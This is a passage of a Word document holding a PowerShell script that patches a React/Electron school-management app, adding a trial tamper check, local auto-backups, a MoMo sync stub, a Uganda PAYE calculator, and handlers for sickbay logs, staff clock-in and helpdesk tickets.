        <w:t>root.render(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="A522DA66">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  &lt;React.StrictMode&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D70068D5">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;ErrorBoundary&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7316EA20">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &lt;AuthProvider&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19655AAC">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;App /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="A7468FD3">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;Toaster position="top-right" toastOptions={{ duration: 4000, style: { background: '#333', color: '#fff' } }} /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="F6C86C26">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &lt;/AuthProvider&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="DE16EA33">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;/ErrorBoundary&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18183DE9">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  &lt;/React.StrictMode&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C882D0A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="FDA7E1C3">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>'@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102CFB91">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $safeRender = $newRender.Replace('$', '$$')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704FAC90">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = $c -replace "root\.render\(\s*&lt;React\.StrictMode&gt;\s*&lt;AuthProvider&gt;\s*&lt;App /&gt;\s*&lt;/AuthProvider&gt;\s*&lt;/React\.StrictMode&gt;\s*\);", $safeRender</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCE622A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Set-Content -Path $mainJsxPath -Value $c -Encoding UTF8 -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5985B0D9">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B3411F43">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="C3AFAF24">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t># ═══ 6. UPGRADE ELECTRON MAIN.JS ═══</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="DF18D1DE">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Write-Host "[6/15] Upgrading Electron Main.js..." -ForegroundColor Yellow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21199057">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $mainPath = Join-Path $root "electron\main.js"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D171B415">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>if (Test-Path $mainPath) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72537D79">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = Get-Content $mainPath -Raw -Encoding UTF8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028ADA53">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61166606">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if ($c -notmatch "PRAGMA journal_mode = WAL") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="AC8FD015">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        $c = $c -replace "if \(dbData\.length &gt; 0\) \{", "if (dbData.length &gt; 0) {`n try { db.run('PRAGMA journal_mode = WAL;'); db.run('PRAGMA foreign_keys = ON;'); } catch(e) { console.log('WAL mode failed:', e.message); }"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="966B44A3">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5FCAEC">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68D18A66">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if ($c -notmatch "devtools-opened") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CFB842">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        $c = $c -replace "mainWindow\.once\('ready-to-show', \(\) =&gt; mainWindow\.show\(\)\);", "mainWindow.once('ready-to-show', () =&gt; mainWindow.show());`n if (!isDev) { mainWindow.webContents.on('devtools-opened', () =&gt; { mainWindow.webContents.closeDevTools(); }); }"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E33EE71">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="BA5274B2">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C5ABCDC">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $enterpriseLogic = @'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FF5876">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>// ═══ TAMPER-PROOF TRIAL &amp; SaaS LICENSE CHECK ═══</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D8E05A9C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>const Store = require('electron-store');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="EC3C1E5C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>const secureStore = new Store({ name: 'secure_config' });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB9502F">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54D84CCF">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>function checkTamper() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B39D416C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  const lastRun = secureStore.get('last_run_timestamp');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="9E8349B2">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  const now = Date.now();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="A1C07E7B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  if (lastRun &amp;&amp; now &lt; lastRun) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A247B3F">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    console.error('[SECURITY] System clock rolled back! Flagging as tampered.');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B393F729">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    safeRun("INSERT OR REPLACE INTO system_settings (key, value) VALUES ('license_tampered', 'true')");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BC84EE">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B826D101">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  secureStore.set('last_run_timestamp', now);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB900C9">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E95B6EF">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F84E231">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>// ═══ AUTO-BACKUP SYSTEM (24 HOURS) ═══</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31814619">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>function checkAutoBackup() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D1CA50A1">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="ABD00180">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    const lastBackupRes = db.exec("SELECT value FROM system_settings WHERE key = 'last_auto_backup'");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E83253F4">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    let lastBackup = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="CC073FF9">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if (lastBackupRes.length &gt; 0 &amp;&amp; lastBackupRes[0].values.length &gt; 0) { lastBackup = parseInt(lastBackupRes[0].values[0][0]) || 0; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="82A1D228">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    const now = Date.now();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56088C67">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if (now - lastBackup &gt; 86400000) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="F0003D2D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      console.log('[AutoBackup] 24h reached. Backing up...');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="8981CD56">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      const backupsDir = path.join(app.getPath('userData'), 'backups');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="AA292F63">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      if (!fs.existsSync(backupsDir)) fs.mkdirSync(backupsDir, { recursive: true });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2897B1">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      fs.copyFileSync(dbPath, path.join(backupsDir, `auto_backup_${now}.db`));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="BBDB8396">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      safeRun("INSERT OR REPLACE INTO system_settings (key, value) VALUES ('last_auto_backup', ?)", [String(now)]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="C5148199">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      saveDb();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="F192F84A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F697D04">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  } catch (e) { console.error('[AutoBackup] Error:', e.message); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="94071294">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="9F3ECFAA">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E5AA573">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>// ═══ MOMO SYNC (MTN) ═══</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="F7CDE99F">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>async function syncMomoPayments() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCFFCAF">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F954A6">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    const lastSyncRes = db.exec("SELECT value FROM system_settings WHERE key = 'last_momo_sync'");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE128E3">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    let lastSync = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B734F5B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if (lastSyncRes.length &gt; 0 &amp;&amp; lastSyncRes[0].values.length &gt; 0) lastSync = parseInt(lastSyncRes[0].values[0][0]) || 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6186C4DF">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    const mtnKey = safeQuery("SELECT value FROM system_settings WHERE key = 'mtn_api_key'")[0]?.value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714E8F48">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if (!mtnKey) return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="AFCF1665">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    console.log('[MoMo Sync] Checking for online payments since', new Date(lastSync).toISOString());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="BEC09921">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    safeRun("INSERT OR REPLACE INTO system_settings (key, value) VALUES ('last_momo_sync', ?)", [String(Date.now())]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="9F918FB2">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  } catch (e) { console.error('[MoMo Sync] Error:', e.message); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ACBB6D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="C09B9FDD">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="658FC035">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>// ═══ PAYE CALCULATOR (Uganda) ═══</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0259404C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>function calculatePAYE(grossPay) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4442B9C1">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  if (grossPay &lt;= 235000) return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E5308E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  if (grossPay &lt;= 335000) return (grossPay - 235000) * 0.10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D4F948A6">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  if (grossPay &lt;= 410000) return 10000 + (grossPay - 335000) * 0.20;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="C2FD27C5">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  return 25000 + (grossPay - 410000) * 0.30;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="DA942A09">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3539E143">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>'@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC3B57E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $enterpriseLogicSafe = $enterpriseLogic.Replace('$', '$$')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578C4C75">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if ($c -notmatch "TAMPER-PROOF TRIAL") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E37ABF83">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        $c = $c -replace "app\.whenReady\(\)\.then\(async \(\) =&gt; \{", "$enterpriseLogicSafe`n`napp.whenReady().then(async () =&gt; {`n  checkTamper();`n  checkAutoBackup();`n  setInterval(checkAutoBackup, 600000);`n  setInterval(syncMomoPayments, 300000);"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308A3ED9">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E783269C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="797CD2DF">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $allIpcHandlers = @'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58682A99">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>// ═══ ENTERPRISE IPC HANDLERS ═══</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D04424EB">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>ipcMain.handle('log-sickbay', async (e, data) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615211F2">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  if (!db) return { success: false, error: 'DB not ready' };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3635E6D5">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4ADDE3">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    safeRun("INSERT INTO sickbay_log (student_id, date, complaint, treatment, status) VALUES (?, ?, ?, ?, ?)",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="8A1D36CC">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      [data.student_id, data.date, data.complaint, data.treatment, data.status]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CD3075">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return { success: true };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="C2A3CC60">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  } catch (err) { return { success: false, error: err.message }; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5320016F">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="912B29E1">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CEFB177">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>ipcMain.handle('staff-clock-in', async (e, staffId) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052BFF10">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  if (!db) return { success: false, error: 'DB not ready' };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D68D8C9E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50772210">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    const today = new Date().toISOString().slice(0, 10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B59BDF6B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    const rows = safeQuery("SELECT id, clock_in_time FROM staff_clockins WHERE staff_id = ? AND date(clock_in_time) = ? ORDER BY id DESC LIMIT 1", [staffId, today]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D284746E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if (rows.length &gt; 0 &amp;&amp; !rows[0].clock_out_time) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538E00BF">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      safeRun("UPDATE staff_clockins SET clock_out_time = datetime('now') WHERE id = ?", [rows[0].id]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ACD8CF">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      return { success: true, action: 'clocked_out' };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555EF480">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    } else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="9EE1466D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      const res = safeRun("INSERT INTO staff_clockins (staff_id, clock_in_time) VALUES (?, datetime('now'))", [staffId]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3F43CC">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      return { success: true, action: 'clocked_in', id: res.lastInsertRowid };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D5AC50C2">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="BB604CF6">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  } catch (err) { return { success: false, error: err.message }; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D15B065">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D979AA02">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="A0868597">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>ipcMain.handle('submit-helpdesk-ticket', async (e, data) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="9D5A86A1">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC2D902">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    const nodemailer = require('nodemailer');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EEAAF6">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    const gmailPass = process.env.GMAIL_PASS || safeQuery("SELECT value FROM system_settings WHERE key = 'gmail_app_pass'")[0]?.value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738C83AE">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
